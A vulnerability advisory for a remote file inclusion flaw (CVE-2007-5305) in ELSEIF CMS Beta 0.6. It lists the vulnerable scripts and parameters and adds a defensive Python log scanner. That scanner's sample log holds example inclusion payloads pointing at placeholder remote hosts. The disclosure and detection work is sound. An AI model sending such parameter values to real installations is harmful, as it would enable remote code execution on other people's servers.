PT-2007-6378 · Elseif · Elseif Cms

Hackers Pal · Published 2007-10-09 · Updated 2018-10-15 · CVE-2007-5305

CVSS v2.0: 7.5 (High)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions: ELSEIF CMS version Beta 0.6
Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in several parameters, including the contenus parameter to contenus.php, the tpelseifportalrepertoire parameter to multiple files such as votes.php, espaceperso.php, enregistrement.php, commentaire.php, and coeurusr.php in the utilisateurs/ directory, as well as articles/fonctions.php and depot/fonctions.php in the moduleajouter/ directory. Additionally, the corpsdesign parameter in articles/usrarticles.php and depot/usrdepot.php in moduleajouter/ is vulnerable. This could potentially lead to the execution of arbitrary code.
Recommendations: For ELSEIF CMS version Beta 0.6, consider disabling the contenus.php, votes.php, espaceperso.php, enregistrement.php, commentaire.php, coeurusr.php, articles/fonctions.php, depot/fonctions.php, articles/usrarticles.php, and depot/usrdepot.php files until a patch is available. Restrict access to the utilisateurs/ and moduleajouter/ directories to minimize the risk of exploitation. Avoid using the contenus, tpelseifportalrepertoire, and corpsdesign parameters in the affected files until the issue is resolved.
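
A log check for the parameters named in the description, added here as an example and not part of the original advisory or of ELSEIF CMS. It flags requests in which contenus, tpelseifportalrepertoire or corpsdesign carries a URL instead of a local value. The combined access-log format, the install paths, the hosts and the log lines themselves are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameter names taken from the advisory text.
SUSPECT_PARAMS = {"contenus", "tpelseifportalrepertoire", "corpsdesign"}
# A value starting with "scheme://" or a protocol-relative "//" points off-site.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def find_remote_include_attempts(log_lines):
    """Return (line_number, path, parameter, value) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        # parse_qsl percent-decodes once; unquote again to catch double encoding.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            value = unquote(value)
            if name.lower() in SUSPECT_PARAMS and REMOTE_VALUE.match(value):
                hits.append((number, target.path, name, value))
    return hits

# Constructed sample lines (documentation IP ranges, .invalid hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Oct/2007:10:01:12 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Oct/2007:10:01:15 +0000] "GET /contenus.php?contenus=http://files.example.invalid/a.txt? HTTP/1.1" 200 312 "-" "-"',
    '198.51.100.4 - - [09/Oct/2007:10:02:40 +0000] "GET /utilisateurs/votes.php?tpelseifportalrepertoire=portail HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [09/Oct/2007:10:03:02 +0000] "GET /moduleajouter/depot/usrdepot.php?corpsdesign=ftp%3A%2F%2Ffiles.example.invalid%2Fb HTTP/1.1" 200 90 "-" "-"',
]

if __name__ == "__main__":
    for number, path, name, value in find_remote_include_attempts(SAMPLE_LOG):
        print(f"line {number}: {path} {name}={value}")
```

Only query-string parameters are inspected; values sent in a POST body do not appear in a standard access log and need request-body logging to be covered.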

Exploit

Fix

Code Injection

Weakness Enumeration

Related Identifiers

CVE-2007-5305

Affected Products

Elseif Cms